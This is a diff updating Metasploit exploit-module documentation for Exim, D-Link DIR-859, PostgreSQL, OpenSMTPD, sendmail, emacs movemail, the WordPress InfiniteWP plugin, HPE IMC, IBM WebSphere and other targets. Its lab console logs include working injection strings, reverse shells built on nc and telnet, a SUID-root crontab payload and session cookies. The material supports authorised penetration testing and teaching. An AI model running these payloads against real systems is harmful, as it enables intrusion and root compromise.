 msf5 exploit(linux/local/exim4_deliver_message_priv_esc) > set lhost 192.168.0.50
@@ -71,7 +71,7 @@ msf5 exploit(linux/local/exim4_deliver_message_priv_esc) > check
 [*] The target appears to be vulnerable.
 msf5 exploit(linux/local/exim4_deliver_message_priv_esc) > exploit

-[*] Started reverse TCP handler on 192.168.0.50:13371 
+[*] Started reverse TCP handler on 192.168.0.50:13371
 [*] Payload sent, wait a few seconds...
 [*] Sending stage (985320 bytes) to 192.168.0.80
 [*] Meterpreter session 2 opened (192.168.0.50:13371 -> 192.168.0.80:45562) at 2019-07-07 23:46:37 +0100
@@ -0,0 +1,46 @@
+## Vulnerable Application
+
+### Introduction
+
+This module exploits CVE-2019–20215, an unauthenticated remote injection of operating system commands.
+The vulnerability was found in the ssdpcgi() function, and the payload can be injected through either the UUID
+or URN headers of a M-SEARCH UPnP request.
+
+Get a [D-Link router/vulnerable firmware](https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10147),
+or download firmware versions 1.06 or 1.05 and run them on firmadyne or similar emulation frameworks.
+
+## Verification Steps
+
+1. Set up router/emulated device
+2. Start `msfconsole`
+3. Do: `use exploit/linux/http/dlink_dir859_exec_ssdpcgi`
+4. Do: `set RHOSTS <router_ip>`
+5. Do: `set LHOST <local_ip>`
+6. Do: `set TARGET <URN/UUID>`
+7. Do: `run`
+8. You should get a session as `root`.
+
+## Options
+
+**VECTOR**
+
+This option denotes which header will be used in the request (UUID or URN)
+that triggers the vulnerability.
+
+## Scenarios
+
+### D-link DIR-859 Firmware 1.05
+
+```
+msf5 exploit(linux/http/dlink_dir859_exec_ssdpcgi) > run 
+[*] Started reverse TCP handler on 192.168.0.2:4444 
+[*] Using URL: http://0.0.0.0:8080/38YWEX2
+[*] Local IP: http://192.168.70.28:8080/38YWEX2
+[*] Target Payload URN
+[*] Client 192.168.0.1 (Wget) requested /38YWEX2
+[*] Sending payload to 192.168.0.1 (Wget)
+[*] Command Stager progress - 100.00% done (110/110 bytes)
+[*] Meterpreter session 1 opened (192.168.0.2:4444 -> 192.168.0.1:41057) at 2029-12-31 14:15:22 -0300
+[*] Server stopped.
+meterpreter > 
+```
@@ -1,20 +1,20 @@
+## Vulnerable Application
+
 This module attempts to create a new table, then execute system commands in the
 context of copying the command output into the table.

 This module should work on all Postgres systems running version 9.3 and above.

-## Vulnerable Application
-
-  Download any version of PostgreSQL from 9.3 to 11.2 (Latest at time of writing)
-  Set up the software and connect as the postgres superuser.
-  Use the techniques described in this blogpost to verify command execution:
-    https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5
+Download any version of PostgreSQL from 9.3 to 11.2 (Latest at time of writing)
+Set up the software and connect as the postgres superuser.
+Use the techniques described in this blogpost to verify command execution:
+  https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5

 ## Verification Steps

  You must be able to connect to the PostgreSQL database, and have a valid set of superuser
  credentials, or a user in the 'pg_execute_server_program' group
-  
+
  Exploiting Linux/OSX:

    1. Start msfconsole
@@ -27,7 +27,7 @@ This module should work on all Postgres systems running version 9.3 and above.
    8. set LHOST my.ip.add.ress
    9. set LHOST myport
    10. exploit
-  
+
  Exploiting Windows:

    1. Start msfconsole
@@ -45,31 +45,30 @@ This module should work on all Postgres systems running version 9.3 and above.
    13. set DATABASE postgres
    14. exploit

-
 ## Options

  **TABLENAME**
-  
+
  The name of the table to create in the database, default is set to 'msftesttable', this table will be dropped create a new
  one each time the exploit is run.
-  
+
  **DUMP_TABLE_OUTPUT**

-  If enabled this option will perform a select statement on the created table before it is deleted. This can be used for 
-  debugging if there are problems with a command being executed. 
-  
+  If enabled this option will perform a select statement on the created table before it is deleted. This can be used for
+  debugging if there are problems with a command being executed.
+
  **DATABASE**
-  
+
  Name of the database to connect to
-  
+
  **USERNAME**
-  
+
  A valid username that allows access to the database
-  
+
  **PASSWORD**
-  
+
  A valid password that allows access to the database
-  
+
 ## Scenarios

 ### Exploiting PostgreSQL 11.2 on Linux Ubuntu 18.04
@@ -114,7 +113,7 @@ This module should work on all Postgres systems running version 9.3 and above.
       Id  Name
       --  ----
       0   Automatic
-   
+    
     msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > exploit

    [*] Started reverse TCP handler on 192.168.0.18:4456
@@ -133,10 +132,9 @@ This module should work on all Postgres systems running version 9.3 and above.
    Linux ubuntu 4.15.0-45-generic #48-Ubuntu SMP Tue Jan 29 16:28:13 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
    /usr/lib/postgresql/11/bin/postgres -V
    postgres (PostgreSQL) 11.2 (Ubuntu 11.2-1.pgdg18.04+1)
-   
+
 ### Exploiting PostgreSQL 10.7 on Windows 10

-    
    msf5 exploit(multi/script/web_delivery) > set target 2
    target => 2
    msf5 exploit(multi/script/web_delivery) > set payload windows/meterpreter/reverse_tcp
@@ -1,10 +1,13 @@
-## Introduction
+## Vulnerable Application
+
+### Description

 This module exploits a SUID installation of the Emacs `movemail` utility
 to run a command as root by writing to 4.3BSD's `/usr/lib/crontab.local`.
+
 The vulnerability is documented in Cliff Stoll's book *The Cuckoo's Egg*.

-## Setup
+### Setup

 A Docker environment for 4.3BSD on VAX is available at
 <https://github.com/wvu/ye-olde-bsd>.
@@ -14,7 +17,7 @@ For manual setup, please follow the Computer History Wiki's
 Garvin's [guide](http://plover.net/~agarvin/4.3bsd-on-simh.html) if
 you're using [Quasijarus](http://gunkies.org/wiki/4.3_BSD_Quasijarus).

-## Targets
+### Targets

 ```
 Id  Name
@@ -22,6 +25,10 @@ Id  Name
 0   /usr/lib/crontab.local
 ```

+## Verification Steps
+
+Follow [Setup](#setup) and [Scenarios](#scenarios).
+
 ## Options

 **MOVEMAIL**
@@ -34,15 +41,34 @@ If your payload is `cmd/unix/generic` (suggested default), set this to
 the command you want to run as root. The provided default will create a
 SUID-root shell at `/tmp/sh`.

-## Usage
+## Scenarios
+
+### 4.3BSD

 ```
+msf5 > use exploit/unix/local/emacs_movemail
+msf5 exploit(unix/local/emacs_movemail) > show missing
+
+Module options (exploit/unix/local/emacs_movemail):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SESSION                   yes       The session to run this module on.
+
+
+Payload options (cmd/unix/generic):
+
+   Name  Current Setting  Required  Description
+   ----  ---------------  --------  -----------
+
+msf5 exploit(unix/local/emacs_movemail) > set session -1
+session => -1
 msf5 exploit(unix/local/emacs_movemail) > run

 [*] Setting a sane $PATH: /bin:/usr/bin:/usr/ucb:/etc
-[*] Current shell is /bin/sh
+[-] Current shell is unknown
 [*] $PATH is /bin:/usr/bin:/usr/ucb:/etc
-[+] SUID-root [redacted] found
+[+] SUID-root /etc/movemail found
 [*] Preparing crontab with payload
 * * * * * root cp /bin/sh /tmp && chmod u+s /tmp/sh
 * * * * * root rm -f /usr/lib/crontab.local
@@ -50,12 +76,5 @@ msf5 exploit(unix/local/emacs_movemail) > run
 [+] Writing crontab to /usr/lib/crontab.local
 [!] Please wait at least one minute for effect
 [*] Exploit completed, but no session was created.
-msf5 exploit(unix/local/emacs_movemail) > sessions -1
-[*] Starting interaction with 1...
-
-ls -l /usr/lib/crontab.local /tmp/sh
-/usr/lib/crontab.local not found
-rwsr-xr-x  1 root        23552 Nov 22 15:17 /tmp/sh
-/tmp/sh -c whoami
-root
+msf5 exploit(unix/local/emacs_movemail) >
 ```
@@ -1,4 +1,6 @@
-## Introduction
+## Vulnerable Application
+
+### Description

 This module exploits `sendmail`'s well-known historical debug mode to
 escape to a shell and execute commands in the SMTP `RCPT TO` command.
@@ -6,7 +8,7 @@ escape to a shell and execute commands in the SMTP `RCPT TO` command.
 This vulnerability was exploited by the Morris worm in 1988-11-02.
 Cliff Stoll reports on the worm in the epilogue of *The Cuckoo's Egg*.

-## Setup
+### Setup

 A Docker environment for 4.3BSD on VAX is available at
 <https://github.com/wvu/ye-olde-bsd>.
@@ -16,7 +18,7 @@ For manual setup, please follow the Computer History Wiki's
 Garvin's [guide](http://plover.net/~agarvin/4.3bsd-on-simh.html) if
 you're using [Quasijarus](http://gunkies.org/wiki/4.3_BSD_Quasijarus).

-## Targets
+### Targets

 ```
 Id  Name
@@ -24,6 +26,10 @@ Id  Name
 0   @(#)version.c       5.51 (Berkeley) 5/2/86
 ```

+## Verification Steps
+
+Follow [Setup](#setup) and [Scenarios](#scenarios).
+
 ## Options

 **RPORT**
@@ -33,62 +39,66 @@ port may be forwarded when NAT (SLiRP) is used in SIMH.

 **PAYLOAD**

-Set this to a Unix command payload. Currently only `cmd/unix/reverse`
+Set this to a Unix command payload. Currently, only `cmd/unix/reverse`
 and `cmd/unix/generic` are supported.

-## Usage
+## Scenarios
+
+### `sendmail` 5.51 on 4.3BSD

 ```
-msf5 exploit(unix/smtp/morris_sendmail_debug) > options
+msf5 > use exploit/unix/smtp/morris_sendmail_debug
+msf5 exploit(unix/smtp/morris_sendmail_debug) > show missing

 Module options (exploit/unix/smtp/morris_sendmail_debug):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
-   RHOSTS  127.0.0.1        yes       The target address range or CIDR identifier
-   RPORT   25               yes       The target port (TCP)
+   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'


 Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
-   LHOST  192.168.1.5      yes       The listen address (an interface may be specified)
-   LPORT  4444             yes       The listen port
-
-
-Exploit target:
-
-   Id  Name
-   --  ----
-   0   @(#)version.c       5.51 (Berkeley) 5/2/86
-
+   LHOST                   yes       The listen address (an interface may be specified)

+msf5 exploit(unix/smtp/morris_sendmail_debug) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf5 exploit(unix/smtp/morris_sendmail_debug) > set lhost 192.168.56.1
+lhost => 192.168.56.1
 msf5 exploit(unix/smtp/morris_sendmail_debug) > run

-[*] Started reverse TCP double handler on 192.168.1.5:4444
+[*] Started reverse TCP double handler on 192.168.56.1:4444
 [*] 127.0.0.1:25 - Connecting to sendmail
 [*] 127.0.0.1:25 - Enabling debug mode and sending exploit
+[*] 127.0.0.1:25 - Expecting: /220.*Sendmail/
 [*] 127.0.0.1:25 - Sending: DEBUG
-[*] 127.0.0.1:25 - Sending: MAIL FROM:<GmWE2vWEViR4CLhBWOOOUVSMjJEr2NymDveA>
+[*] 127.0.0.1:25 - Expecting: /200 Debug set/
+[*] 127.0.0.1:25 - Sending: MAIL FROM:<3V900gQTSR70m6QPRYJnf3eoUIe6>
+[*] 127.0.0.1:25 - Expecting: /250.*Sender ok/
 [*] 127.0.0.1:25 - Sending: RCPT TO:<"| sed '1,/^$/d' | sh; exit 0">
+[*] 127.0.0.1:25 - Expecting: /250.*Recipient ok/
 [*] 127.0.0.1:25 - Sending: DATA
+[*] 127.0.0.1:25 - Expecting: /354 Enter mail.*itself/
 [*] 127.0.0.1:25 - Sending:  PATH=/bin:/usr/bin:/usr/ucb:/etc
 [*] 127.0.0.1:25 - Sending: export PATH
-[*] 127.0.0.1:25 - Sending: sh -c '(sleep 4197|telnet 192.168.1.5 4444|while : ; do sh && break; done 2>&1|telnet 192.168.1.5 4444 >/dev/null 2>&1 &)'
+[*] 127.0.0.1:25 - Sending: sh -c '(sleep 3935|telnet 192.168.56.1 4444|while : ; do sh && break; done 2>&1|telnet 192.168.56.1 4444 >/dev/null 2>&1 &)'
 [*] 127.0.0.1:25 - Sending: .
+[*] 127.0.0.1:25 - Expecting: /250 Ok/
 [*] 127.0.0.1:25 - Sending: QUIT
+[*] 127.0.0.1:25 - Expecting: /221.*closing connection/
 [*] Accepted the first client connection...
 [*] Accepted the second client connection...
-[*] Command: echo zqhqKJD7trW0E0Lp;
+[*] Command: echo ISj759F8jEik4HAW;
 [*] Writing to socket A
 [*] Writing to socket B
 [*] Reading from sockets...
-[*] Reading from socket B
-[*] B: "zqhqKJD7trW0E0Lp\r\n"
+[*] Reading from socket A
+[*] A: "sh: Connected: not found\r\nsh: Escape: not found\r\n"
 [*] Matching...
-[*] A is input...
-[*] Command shell session 1 opened (192.168.1.5:4444 -> 192.168.1.5:64337) at 2018-10-20 14:08:03 -0500
+[*] B is input...
+[*] Command shell session 1 opened (192.168.56.1:4444 -> 192.168.56.1:58037) at 2020-02-06 15:51:28 -0600
 [!] 127.0.0.1:25 - Do NOT type `exit', or else you may lose further shells!
 [!] 127.0.0.1:25 - Hit ^C to abort the session instead, please and thank you

@@ -0,0 +1,116 @@
+## Vulnerable Application
+
+### Description
+
+This module exploits a command injection in the `MAIL FROM` field during
+SMTP interaction with OpenSMTPD to execute code as the root user.
+
+### Setup
+
+1. Download [OpenBSD 6.6](https://cdn.openbsd.org/pub/OpenBSD/6.6/amd64/install66.iso)
+2. Install the system, noting the domain name (defaults to
+   `foo.my.domain`)
+3. Configure the following settings in `/etc/mail/smtpd.conf`:
+  * `listen on all`
+  * `match from any for domain "foo.my.domain" action "local_mail"`
+4. Execute `/etc/rc.d/smtpd restart` to restart OpenSMTPD
+5. Execute `ifconfig` and look for an appropriate target IP
+
+### Targets
+
+```
+Id  Name
+--  ----
+0   OpenSMTPD >= commit a8e222352f
+```
+
+## Verification Steps
+
+Follow [Setup](#setup) and [Scenarios](#scenarios).
+
+## Options
+
+**RCPT_TO**
+
+Set this to a valid mail recipient. The default is `root`.
+
+## Scenarios
+
+### OpenSMTPD 6.6.0 on OpenBSD 6.6
+
+```
+msf5 > use exploit/unix/smtp/opensmtpd_mail_from_rce
+msf5 exploit(unix/smtp/opensmtpd_mail_from_rce) > show missing
+
+Module options (exploit/unix/smtp/opensmtpd_mail_from_rce):
+
+   Name    Current Setting  Required  Description
+   ----    ---------------  --------  -----------
+   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+
+
+Payload options (cmd/unix/reverse_netcat):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+
+msf5 exploit(unix/smtp/opensmtpd_mail_from_rce) > set rhosts 192.168.56.133
+rhosts => 192.168.56.133
+msf5 exploit(unix/smtp/opensmtpd_mail_from_rce) > set lhost 192.168.56.1
+lhost => 192.168.56.1
+msf5 exploit(unix/smtp/opensmtpd_mail_from_rce) > run
+
+[*] Started reverse TCP handler on 192.168.56.1:4444
+[*] 192.168.56.133:25 - Connecting to OpenSMTPD
+[*] 192.168.56.133:25 - Saying hello and sending exploit
+[*] 192.168.56.133:25 - Expecting: /220.*OpenSMTPD/
+[+] 192.168.56.133:25 - Received: 220 foo.my.domain ESMTP OpenSMTPD
+[*] 192.168.56.133:25 - Sending: HELO oKFMWnrTJZjTbzkGfVMsyDy7pO35ze
+[*] 192.168.56.133:25 - Expecting: /250.*pleased to meet you/
+[+] 192.168.56.133:25 - Received:
+250 foo.my.domain Hello oKFMWnrTJZjTbzkGfVMsyDy7pO35ze [192.168.56.1], pleased to meet you
+[*] 192.168.56.133:25 - Sending: MAIL FROM:<;for J in V e E n U T w v A K M a 0 s x;do read;done;sh;exit 0;>
+[*] 192.168.56.133:25 - Expecting: /250.*Ok/
+[+] 192.168.56.133:25 - Received:
+250 2.0.0 Ok
+[*] 192.168.56.133:25 - Sending: RCPT TO:<root>
+[*] 192.168.56.133:25 - Expecting: /250.*Recipient ok/
+[+] 192.168.56.133:25 - Received:
+250 2.1.5 Destination address valid: Recipient ok
+[*] 192.168.56.133:25 - Sending: DATA
+[*] 192.168.56.133:25 - Expecting: /354 Enter mail.*itself/
+[+] 192.168.56.133:25 - Received:
+354 Enter mail, end with "." on a line by itself
+[*] 192.168.56.133:25 - Sending:
+#
+#
+#
+#
+#
+#
+#
+#
+#
+#
+#
+#
+#
+#
+#
+mkfifo /tmp/eizzy; nc 192.168.56.1 4444 0</tmp/eizzy | /bin/sh >/tmp/eizzy 2>&1; rm /tmp/eizzy
+[*] 192.168.56.133:25 - Sending: .
+[*] 192.168.56.133:25 - Expecting: /250.*Message accepted for delivery/
+[+] 192.168.56.133:25 - Received:
+250 2.0.0 ccd8e419 Message accepted for delivery
+[*] 192.168.56.133:25 - Sending: QUIT
+[*] 192.168.56.133:25 - Expecting: /221.*Bye/
+[+] 192.168.56.133:25 - Received:
+221 2.0.0 Bye
+[*] Command shell session 1 opened (192.168.56.1:4444 -> 192.168.56.133:16126) at 2020-02-05 16:16:59 -0600
+
+id
+uid=0(root) gid=0(wheel) groups=0(wheel)
+uname -a
+OpenBSD foo.my.domain 6.6 GENERIC#353 amd64
+```
@@ -0,0 +1,118 @@
+## Vulnerable Application
+
+### Description
+
+This module exploits an authentication bypass in the WordPress
+InfiniteWP Client plugin to log in as an administrator and execute
+arbitrary PHP code by overwriting the file specified by `PLUGIN_FILE`.
+
+The module will attempt to retrieve the original `PLUGIN_FILE` contents
+and restore them after payload execution. If `VerifyContents` is set,
+which is the default setting, the module will check to see if the
+restored contents match the original.
+
+Note that a valid administrator username is required for this module.
+
+WordPress >= 4.9 is currently not supported due to a breaking WordPress
+API change. Tested against 4.8.3.
+
+### Setup
+
+1. Install WordPress 4.8.3 or older
+2. Download <https://downloads.wordpress.org/plugin/iwp-client.1.9.4.4.zip>
+3. Follow <https://wordpress.org/plugins/iwp-client/#installation>
+
+### Targets
+
+```
+Id  Name
+--  ----
+0   InfiniteWP Client < 1.9.4.5
+```
+
+## Verification Steps
+
+Follow [Setup](#setup) and [Scenarios](#scenarios).
+
+## Options
+
+**USERNAME**
+
+Set this to a known, valid administrator username. Authentication will
+be bypassed for this user.
+
+**PLUGIN_FILE**
+
+Set this to a plugin file to insert the payload into, relative to the
+plugins directory, which is normally `/wp-content/plugins`. The file
+must exist and be writable by the web user. It will be overwritten and
+later restored.
+
+**VerifyContents**
+
+Verify that the restored contents of `PLUGIN_FILE` match the original.
+This is the default setting.
+
+## Scenarios
+
+### InfiniteWP Client 1.9.4.4 on WordPress 4.8.3
+
+```
+msf5 > use exploit/unix/webapp/wp_infinitewp_auth_bypass
+msf5 exploit(unix/webapp/wp_infinitewp_auth_bypass) > show missing
+
+Module options (exploit/unix/webapp/wp_infinitewp_auth_bypass):
+
+   Name    Current Setting  Required  Description
+   ----    ---------------  --------  -----------
+   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+
+
+Payload options (php/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+
+msf5 exploit(unix/webapp/wp_infinitewp_auth_bypass) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf5 exploit(unix/webapp/wp_infinitewp_auth_bypass) > set rport 8000
+rport => 8000
+msf5 exploit(unix/webapp/wp_infinitewp_auth_bypass) > set lhost 192.168.56.1
+lhost => 192.168.56.1
+msf5 exploit(unix/webapp/wp_infinitewp_auth_bypass) > run
+
+[*] Started reverse TCP handler on 192.168.56.1:4444
+[*] Executing automatic check (disable AutoCheck to override)
+[+] WordPress 4.8.3 is a supported target
+[*] Found version 1.9.4.4 in the custom file
+[+] The target appears to be vulnerable.
+[*] Bypassing auth for admin at http://127.0.0.1:8000/
+[+] Successfully obtained cookie for admin
+[*] Cookie: wordpress_70490311fe7c84acda8886406a6d884b=admin%7C1581271885%7CgtWIC1eZeuTo2twb615tUCpB4LEUzucWE5qaBl5dgDg%7C3f03c999c52281e3da48bef702b8c8780c3f041b2bba9f222f5d9756cbb18541; wordpress_70490311fe7c84acda8886406a6d884b=admin%7C1581271885%7CgtWIC1eZeuTo2twb615tUCpB4LEUzucWE5qaBl5dgDg%7C3f03c999c52281e3da48bef702b8c8780c3f041b2bba9f222f5d9756cbb18541; wordpress_logged_in_70490311fe7c84acda8886406a6d884b=admin%7C1581271885%7CgtWIC1eZeuTo2twb615tUCpB4LEUzucWE5qaBl5dgDg%7Ca0f3f416f7c60a7e0ea1b17af88d4a5e38d96141451f94fe27f605806f03f0c2; wordpress_sec_70490311fe7c84acda8886406a6d884b=admin%7C1581271885%7CsVlsTRrZ8s8PgSudfIbMXr16rVrlnVz28mENB1jRSOP%7C5ed6dd8146701a38b741bf98cde81cc2b67736b88ea80a10ceba8cf5326b949e; wordpress_sec_70490311fe7c84acda8886406a6d884b=admin%7C1581271885%7CsVlsTRrZ8s8PgSudfIbMXr16rVrlnVz28mENB1jRSOP%7C5ed6dd8146701a38b741bf98cde81cc2b67736b88ea80a10ceba8cf5326b949e; wordpress_logged_in_70490311fe7c84acda8886406a6d884b=admin%7C1581271885%7CsVlsTRrZ8s8PgSudfIbMXr16rVrlnVz28mENB1jRSOP%7Cfeffe683bdfaaa670102e6564130394440510bf97e1ad09713ef1c3aa5627bfc;
+[+] Successfully logged in as admin
+[*] Retrieving original contents of /wp-content/plugins/index.php
+[+] Successfully retrieved original contents of /wp-content/plugins/index.php
+[*] Contents:
+<?php
+// Silence is golden.
+[*] Overwriting /wp-content/plugins/index.php with payload
+[*] Acquired a plugin edit nonce: 74cde501ca
+[*] Edited plugin file index.php
+[+] Successfully overwrote /wp-content/plugins/index.php with payload
+[*] Requesting payload at /wp-content/plugins/index.php
+[*] Restoring original contents of /wp-content/plugins/index.php
+[*] Sending stage (38288 bytes) to 192.168.56.1
+[*] Acquired a plugin edit nonce: 74cde501ca
+[*] Edited plugin file index.php
+[+] Current contents of /wp-content/plugins/index.php match original!
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.1:51923) at 2020-02-07 12:11:28 -0600
+
+meterpreter > getuid
+Server username: www-data (33)
+meterpreter > sysinfo
+Computer    : c7f8fbe7b083
+OS          : Linux c7f8fbe7b083 4.19.76-linuxkit #1 SMP Thu Oct 17 19:31:58 UTC 2019 x86_64
+Meterpreter : php/linux
+meterpreter >
+```
@@ -1,6 +1,6 @@
 ## Introduction

-The .slk file format used by Microsoft Excel has the ability to execute local commands via the `EEXEC(cmd)` function. 
+The .slk file format used by Microsoft Excel has the ability to execute local commands via the `EEXEC(cmd)` function.
 This module takes advantage of this 'feature' to run a download-and-execute powershell command in order to spawn a session
 on the target.

@@ -43,7 +43,7 @@ on the target.
  [*] Using URL: http://192.168.146.1:8080/default.hta
  [*] Server started.
  ```
-  
+
  Once the victim opens the file and clicks 'Enable Content' a session should spawn:

  ```
@@ -1,9 +1,9 @@
 ## Vulnerable Application

  Tested on Windows 7 x64 and x86.
-  
+
  Install the application from the link below and enable the web server by going to Options -> Server -> Enable Web Server on Port.
-  
+
  [Disk Pulse Enterprise v 9.9.16](https://www.exploit-db.com/apps/45ce22525c87c0762f6e467db6ddfcbc-diskpulseent_setup_v9.9.16.exe)

 ## Verification Steps
@@ -20,9 +20,9 @@
  **RHOST**

  IP address of the remote host running the server.
-  
+
  **RPORT**
-  
+
  Port that the web server is running on.  Default is 80 but it can be changed when setting up the program or in the options.

 ## Scenarios
@@ -52,4 +52,4 @@ Microsoft Windows [Version 6.1.7600]
 Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

 C:\Windows\system32>
-  ```
+  ```
@@ -1,6 +1,6 @@
 ## Vulnerable Application

-  Geutebrück GCore Server 1.3.8.42, 1.4.2.37 are vulnerable to a buffer overflow exploitation. 
+  Geutebrück GCore Server 1.3.8.42, 1.4.2.37 are vulnerable to a buffer overflow exploitation.
  Since this application is started with system privileges this allows a system remote code execution.

 ## Verification Steps
@@ -1,10 +1,9 @@
-The module exploits a RCE bug on vulnerable installations of Hewlett Packard Enterprise Intelligent Management Center. Authentication is not required.
-
-The specific flaw exists within the `WebDMDebugServlet`, which listens on TCP ports `8080` and `8443` by default. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute arbitrary code in the context of SYSTEM.
-
-
 ## Vulnerable Application

+  The module exploits a RCE bug on vulnerable installations of Hewlett Packard Enterprise Intelligent Management Center. Authentication is not required.
+
+  The specific flaw exists within the `WebDMDebugServlet`, which listens on TCP ports `8080` and `8443` by default. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute arbitrary code in the context of SYSTEM.
+
  On a Windows machine, download and install a trial version of HPE IMC from here:

  [https://h10145.www1.hpe.com/downloads/DownloadSoftware.aspx?SoftwareReleaseUId=19066&ProductNumber=JG748AAE&lang=&cc=&prodSeriesId=&SaidNumber=](https://h10145.www1.hpe.com/downloads/DownloadSoftware.aspx?SoftwareReleaseUId=19066&ProductNumber=JG748AAE&lang=&cc=&prodSeriesId=&SaidNumber=)
@@ -21,7 +20,7 @@ The specific flaw exists within the `WebDMDebugServlet`, which listens on TCP po
  2. Start msfconsole
  3. Do: ```use exploit/windows/http/hp_imc_java_deserialize```
  4. Do: ```set RHOSTS <RHOSTS>```
-  5. Do: ```set PAYLOAD windows/meterpreter/reverse_tcp``` 
+  5. Do: ```set PAYLOAD windows/meterpreter/reverse_tcp```
  6. Do: ```set LHOST <LHOST>```
  7. Do: ```check```
  8. **Verify** that you are seeing `The target is vulnerable.` in console.
@@ -67,4 +66,4 @@ All versions below 7.3 E0504P2 should be vulnerable remotely.
  Logged On Users : 1
  Meterpreter     : x86/windows
  meterpreter > 
-  ```
+  ```
@@ -1,18 +1,20 @@
-## Description
+## Vulnerable Application
+
+### Description

 This module exploits a vulnerability found in ManageEngine Desktop Central 9. When uploading a 7z file, the FileUploadServlet class does not check the user-controlled ConnectionId parameter in the FileUploadServlet class. This allows a remote attacker to inject a null byte at the end of the value to create a malicious file with an arbitrary file type, and then place it under a directory that allows server-side scripts to run, which results in remote code execution under the context of SYSTEM.
 This exploit was successfully tested on version 9, build 90109 and build 91084.

 **NOTE:** By default, some ManageEngine Desktop Central versions run on port 8020, but older ones run on port 8040. Also, using this exploit will leave debugging information produced by FileUploadServlet in file `rdslog0.txt`.
       
-## ManageEngine Desktop Central 9
+### ManageEngine Desktop Central 9

 Desktop Central is integrated desktop and mobile device management software that helps in managing servers, laptops, desktops, smartphones, and tablets from a central location. It is used for automating your regular desktop management routines like installing patches, distributing software, managing your IT Assets, managing software licenses, monitoring software usage statistics, managing USB device usage, taking control of remote desktops, and more. It supports managing both Windows, Mac and Linux operating systems.

-## Prerequisites
+### Prerequisites

 1. Start a Windows VM (such as Win 7)
-2. Install a vulnerable version of ManageEngine Desktop Central. This exploit was tested on Build [90109](http://archives.manageengine.com/desktop-central/90109/) and [91084](http://archives.manageengine.com/desktop-central/91084/). 
+2. Install a vulnerable version of ManageEngine Desktop Central. This exploit was tested on Build [90109](http://archives.manageengine.com/desktop-central/90109/) and [91084](http://archives.manageengine.com/desktop-central/91084/).
 3. After installation, verify that the server is working by visiting it with a browser. Depending on the version, the server port may be 8020, or 8040.

 ## Verification Steps
@@ -1,9 +1,9 @@
 ## Vulnerable Application

  [Install Octopus Deploy server](https://octopus.com/docs/getting-started#Gettingstarted-InstalltheOctopusserver)
-  
+
  [Create a test user/team](https://octopus.com/docs/administration/managing-users-and-teams) - Team should have "Project contributor" and "Project deployer", or just "System administrator" and add your test user.
-  
+
  [Create an API key](https://octopus.com/docs/how-to/how-to-create-an-api-key)

 ## Verification Steps
@@ -42,6 +42,7 @@
  **SSL**

  Enables or disables SSL. Octopus Deploy server can be configured to listen for HTTP or HTTPS traffic.
+
 ## Scenarios

 ### Octopus Deploy Server 3.16.0
@@ -142,4 +143,4 @@ PS C:\Octopus\ADTest\Work\20170516025952-24> exit
 [*] 10.0.0.12 - Powershell session session 1 closed.  Reason: Died from Errno::ECONNRESET

 msf exploit(octopusdeploy_deploy) > 
-  ```
+  ```
@@ -1,13 +1,13 @@
-## Description
-This module exploits the lack of proper authentication checks in IBM Websphere Application Server ND that allows for the execution of an arbitrary command and upload of an arbitrary file as SYSTEM. The module serializes the required Java objects expected by the IBM Websphere server.
-
-The vulnerability was identified by @rwincey (b0yd) of [Securifera](https://www.securifera.com/) and was assigned [CVE-2019-4279](https://www-01.ibm.com/support/docview.wss?uid=ibm10883628).
-
-
 ## Vulnerable Application
-The module affects [IBM Websphere Application Server Network Deployment](https://www.ibm.com/support/knowledgecenter/en/SSAW57/mapfiles/product_welcome_wasnd.html). The agent is installed on servers with the network deployment feature and listens on TCP port 11002,11004, or 11006. The vulnerability affects versions up to 9.0.0.11.
+
+This module exploits the lack of proper authentication checks in IBM Websphere Application Server ND that allows for the execution of an
+arbitrary command and upload of an arbitrary file as SYSTEM. The module serializes the required Java objects expected by the IBM Websphere server.
+
+The module affects [IBM Websphere Application Server Network Deployment](https://www.ibm.com/support/knowledgecenter/en/SSAW57/mapfiles/product_welcome_wasnd.html).
+The agent is installed on servers with the network deployment feature and listens on TCP port 11002,11004, or 11006. The vulnerability affects versions up to 9.0.0.11.

 ## Verification Steps
+
 To use this exploit you will need access to IBM Websphere Application Server Network Deployment.

 1. Install the IBM Websphere Application Server Network Deployment on a host.
@@ -21,10 +21,12 @@ To use this exploit you will need access to IBM Websphere Application Server Net
 The result should be that calc.exe is executed on the target machine.

 ## Scenarios
+
 The exploit module contains several targets as detailed below.

 ### Target 0: Windows Powershell Injected Shellcode
-This module target provides support for command staging to enable arbitrary Metasploit payloads to be used against Windows targets (for example, a Meterpreter shell). 
+
+This module target provides support for command staging to enable arbitrary Metasploit payloads to be used against Windows targets (for example, a Meterpreter shell).

 ```
 msf5 > use exploit/windows/ibm/ibm_was_dmgr_java_deserialization_rce
@@ -1,6 +1,6 @@
-## Description
+## Vulnerable Application

-This module can be used to execute a payload on IIS servers that have world-writeable directories. The payload is uploaded as an ASP script via a WebDAV PUT request. 
+This module can be used to execute a payload on IIS servers that have world-writeable directories. The payload is uploaded as an ASP script via a WebDAV PUT request.

